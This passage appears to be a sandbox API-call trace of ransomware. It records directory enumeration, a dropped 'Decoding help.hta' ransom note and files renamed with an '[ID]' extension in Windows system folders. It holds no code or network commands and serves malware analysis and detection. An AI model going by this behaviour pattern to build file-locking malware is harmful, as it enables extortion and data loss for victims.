nt\\tabletextservice\\tabletextservicearray.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.341] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77e3f2fc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x77e3f2fc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x77ed787c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xef486, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceDaYi.txt", cAlternateFileName="")) returned 1 [0041.341] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.341] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" [0041.341] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0041.341] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceDaYi.txt") returned -1 [0041.341] lstrlenW (lpString="TableTextServiceDaYi.txt") returned 24 [0041.341] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.341] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="TableTextServiceDaYi.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" [0041.341] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" [0041.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0041.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicedayi.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicedayi.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.341] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f6118a, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47f6118a, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x7821d6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x196b56, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedQuanPin.txt", cAlternateFileName="")) returned 1 [0041.341] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.342] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" [0041.342] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0041.342] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceSimplifiedQuanPin.txt") returned -1 [0041.342] lstrlenW (lpString="TableTextServiceSimplifiedQuanPin.txt") returned 37 [0041.342] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0041.342] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.342] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="TableTextServiceSimplifiedQuanPin.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" [0041.342] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" [0041.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0041.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.342] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ff9706, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47ff9706, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x782dbd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x160e36, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedShuangPin.txt", cAlternateFileName="")) returned 1 [0041.342] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.342] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" [0041.342] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0041.342] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceSimplifiedShuangPin.txt") returned -1 [0041.342] lstrlenW (lpString="TableTextServiceSimplifiedShuangPin.txt") returned 39 [0041.342] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0041.342] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.342] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="TableTextServiceSimplifiedShuangPin.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" [0041.342] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" [0041.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0041.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.343] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x480459c4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x480459c4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x783c05dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1b9fb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedZhengMa.txt", cAlternateFileName="")) returned 1 [0041.343] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.343] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.343] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" [0041.343] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0041.343] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceSimplifiedZhengMa.txt") returned -1 [0041.343] lstrlenW (lpString="TableTextServiceSimplifiedZhengMa.txt") returned 37 [0041.343] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0041.343] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.343] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.343] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="TableTextServiceSimplifiedZhengMa.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" [0041.343] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" [0041.343] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0041.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.343] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482a6fb4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x482a6fb4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x783c05dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 1 [0041.343] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.343] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.343] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" [0041.343] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0041.344] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceYi.txt") returned -1 [0041.344] lstrlenW (lpString="TableTextServiceYi.txt") returned 22 [0041.344] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.344] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.344] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="TableTextServiceYi.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt" [0041.344] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt" [0041.344] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0041.344] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceyi.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceyi.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.344] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482a6fb4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x482a6fb4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x783c05dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 0 [0041.344] FindClose (in: hFindFile=0x5d8290 | out: hFindFile=0x5d8290) returned 1 Thread: id = 270 os_tid = 0x3b8 [0040.890] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*", lpFindFileData=0x1391fd30 | out: lpFindFileData=0x1391fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22bdbd7c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8210 [0040.890] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.890] FindNextFileW (in: hFindFile=0x5d8210, lpFindFileData=0x1391fd30 | out: lpFindFileData=0x1391fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22bdbd7c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.307] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.307] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.307] FindNextFileW (in: hFindFile=0x5d8210, lpFindFileData=0x1391fd30 | out: lpFindFileData=0x1391fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeca1847, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xf901a42, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xeca1847, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpAsDesc.dll.mui", cAlternateFileName="")) returned 1 [0041.307] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*" [0041.307] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*") returned 53 [0041.307] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\Decoding help.hta" [0041.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\decoding help.hta")) returned 0xffffffff [0041.307] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0041.315] WriteFile (in: hFile=0x340, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1391fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1391fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.316] CloseHandle (hObject=0x340) returned 1 [0041.316] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.316] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpAsDesc.dll.mui") returned -1 [0041.316] lstrlenW (lpString="MpAsDesc.dll.mui") returned 16 [0041.316] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*" [0041.316] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*") returned 53 [0041.316] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\", lpString2="MpAsDesc.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui" [0041.316] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui" [0041.316] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.316] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpasdesc.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpasdesc.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.316] FindNextFileW (in: hFindFile=0x5d8210, lpFindFileData=0x1391fd30 | out: lpFindFileData=0x1391fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf9a66, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcf9a66, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpEvMsg.dll.mui", cAlternateFileName="")) returned 1 [0041.316] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*" [0041.316] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*") returned 53 [0041.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files 